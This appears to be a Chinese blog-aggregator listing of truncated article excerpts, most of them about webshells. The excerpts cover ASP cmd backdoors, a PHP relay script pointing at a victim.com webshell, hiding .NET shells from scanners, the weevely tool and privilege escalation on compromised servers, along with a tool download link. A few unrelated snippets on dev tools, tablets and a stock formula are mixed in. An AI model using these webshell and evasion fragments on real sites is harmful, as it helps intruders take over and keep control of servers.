工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<formmethod="post">
<inputtype=textname="cmd"size=60>..
分类:
Web程序 时间:
2014-12-15 06:37:08
阅读次数:
1439
cmd Shell by:anlfi Lock is Switched Off! , The shell can be accessed by anyone! []--------------cmd Shell-----------...
分类:
Web程序 时间:
2014-12-11 06:43:47
阅读次数:
6581
通过本地中转可以很好地防止带后门的菜刀窃取webshell。PHP代码如下所示,原理自行思考,不懂的请留言
<?php
$webshell="http://www.victim.com/webshell.php";//把这里改成你的shell地址
$temp=$_POST;
$data = $temp;
$data = http_build_query($data);
$...
分类:
Web程序 时间:
2014-11-30 00:30:51
阅读次数:
659
首先解释一下为什么要做这个玩意:众所周知.net一句话是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来Jscript市场很低,遇到的.net站基本都是C#。新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接出局。如果不能提权的话,那么过...
分类:
Web程序 时间:
2014-10-19 15:37:43
阅读次数:
222
-前言weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性(生成随机参数且base64加密),在linux上使用时还是很给力的(集服务器错误配置审计,后门放置,暴力破解...
分类:
其他好文 时间:
2014-10-07 21:15:34
阅读次数:
430
太久都没有看菜刀上的webshell,之前拿的都被删的差不多了,所以决定把手上的一些站都提权。菜鸟拿一个shell不简单阿。这都是一些简单的提权,大牛可飞过。把大马上传上去后,稍微看了下,ASP,PHP,ASPX都是支持的,不过wscript.shell组件是已经关闭的了。那么就用PHP的来提权吧。...
分类:
其他好文 时间:
2014-09-12 22:00:14
阅读次数:
279
俗话说的好:武功再好,一砖撂倒;功夫再高,也怕菜刀。可想而知,拥有工具是多么重要!!!哈哈,不闲扯了,直接给大家上工具吧。很多大牛都是有一套自己钟爱的工具集和资源集的哦。在今天这篇文章中,我将介绍一些能够帮助你高效开发的工具脚本和资源,权当抛砖引玉,希望能够带给大家帮助。1.JSFIDDLEJSFI...
分类:
其他好文 时间:
2014-09-05 23:33:22
阅读次数:
170
旧有两把菜刀闹革命,今有两个平板打天下。最近搞了个七寸平板手机,用了几天,很是满意,即可打电话,又可刷微博微信,又可看电子书、PDF,还可以打游戏,重度应用下也能支撑10小时。恰逢苏菲3(Surface Pro3)上市。这两平板配合,相得益彰,正可满足俺移动办公的需要,所以写了这篇文章:4G移动互联...
分类:
移动开发 时间:
2014-09-02 11:51:14
阅读次数:
230
免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任! ------------------------------------------------------------ 说明: 我是一个产刀的,用于什么用途,由您自行选择。致谢: 菜刀某前辈及各...
分类:
Web程序 时间:
2014-08-29 01:14:26
阅读次数:
330
BI:=(H+L+O+C)/4;BOL:EMA(BI,N);UPPER:BOLL+N1*STD(CLOSE,N);LOWER:BOLL-N1*STD(CLOSE,N);MA1:MA(CLOSE,M1);MA2:MA(CLOSE,M2);MA3:MA(CLOSE,M3);MA4:MA(CLOSE,M4...
分类:
其他好文 时间:
2014-07-23 11:46:56
阅读次数:
187
